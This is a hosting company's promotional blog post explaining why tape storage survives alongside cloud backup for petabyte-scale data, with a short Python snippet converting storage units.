Obsolescence is real, and it’s an unavoidable reality for nearly all types of technology eventually. Even what is especially practical today will likely one day become useless, and as has often been said, ‘you can’t stop progress.’ When it comes to the digital world and our ever-greater demands for data storage, the way the cloud has started physical storage down the road to obsolescence is definitely a good thing, especially considering that physical data storage comes with a whole whack of costs that go profoundly beyond what it costs to lease the space.

The migration from tape storage to cloud has been underway for the better part of 2 decades now, and here at 4GoodHosting we are like any good Canadian web hosting provider in that we know all about the pros and cons of data storage means given the nature of what we do for our customers and the fact that we have 2 major data centers of our own in both Vancouver and Toronto. Cloud storage is the way of the future, and all things considered it 100% is a better choice for data storage.

The merits of tape storage for certain types of data continue to exist, however, and in particular it has a lot going for it when it comes to storing petabyte-scale data. If you don’t know what that is, we can explain. You almost certainly know what a gigabyte is, and that there are 1,024 of them in a terabyte. Well, a petabyte is 1,024 terabytes. So needless to say we’re talking about a very large amount of data, but what is it that makes tape storage preferable in some instances with this data? Is it just the sheer size of it that is the primary factor?
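
For anyone who likes to see the arithmetic written out, here’s the quick version of those binary-prefix conversions.

# Binary-prefix units: 1 TB = 1,024 GB, 1 PB = 1,024 TB
gb_per_tb = 1024
tb_per_pb = 1024
gb_per_pb = gb_per_tb * tb_per_pb
print(f"1 PB = {tb_per_pb} TB = {gb_per_pb:,} GB")  # 1 PB = 1024 TB = 1,048,576 GB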

This is what we’ll look at with this week’s entry, and why the use of tape storage resists going entirely extinct.

Slow to Dwindle

Here in late 2021 only 4% still use tape as their only backup method, while the use of cloud and online backups has gone up to 51%. It is estimated that 15% use a combination of disk and tape. It’s easy to list what is inferior about tape storage, but it is difficult and slow to eliminate completely due to the years of historic backups needing to be kept. Smaller businesses are the ones that can often get away from it freely and switch to a new method without much hassle.

For larger firms, however, and those with compliance requirements, it is still quite common to need to retain tape storage. Many times this is because of regulations pertaining to the operation of the business. Some companies don’t like what the transfer costs and the manpower required to manage two backup methods while older retentions expire are going to entail, and this has them sticking with tape storage too.

Cost considerations are definitely a big drawback to making a wholesale switch, because migrating years of tape archives to a new medium can be very expensive. Meanwhile, with greater adoption of cloud storage have come lower costs, which in turn has made it even more appealing.

Demand = Supply = Lower Costs


Another reason some stick with tape is that the tapes themselves are incredibly inexpensive. When cloud backup services were first introduced, the high cost of disk storage and bandwidth made them too expensive for most, but as those costs have plummeted, online and cloud backup has become increasingly accessible. Tape, meanwhile, has become more and more archaic and less and less used, so its cost hasn’t come down at all.

Even if tape is still less expensive (and it is), the benefits of automation, control, and reliability make cloud backups less pricey in the long run, along with offering obvious peace of mind from knowing data isn’t stored in a physical data center that carries risk factors the cloud doesn’t. Smaller organizations that still have extensive storage needs for multiple petabytes of data will find that the cost difference between tape and the cloud becomes quite significant.

Physical Air Gap

Another plus for tape backups is that they offer the benefit of being physically separate and offline from the systems being protected. In many ways this is kind of like reverting to an older, offline technology to thwart anyone with malicious plans who isn’t familiar with that technology. There are methods to logically ‘air-gap’ and separate cloud backups from your production environment, but they don’t have that reassuring nature that some people like when they’re able to have a tangible version of something.

All in all, though, the idea of relying on a degradable magnetic storage medium isn’t wise for most people, and the primary reason they will want to upgrade to a more modern solution is for automation and reliability. Keep in mind as well that tape backups are a very manual process; they need to be loaded, collected, and transported to an off-site storage location.

Slow but Sure Shift

The industry consensus is that tapes will not stop being used any time soon. Tape storage is expected to continue to be the lowest cost storage option for the foreseeable future, and tape sales to hyperscale data libraries do continue at the same levels seen over the last decade and beyond.

With more data moving to the cloud all the time, cloud providers are going to need to offer even more competitive low-cost storage. The lowest cost archive tiers of storage offered by all the major cloud providers use some amount of tape storage, even if you’d guess they don’t. For data storage in the petabytes, there’s still a lot to be said for it.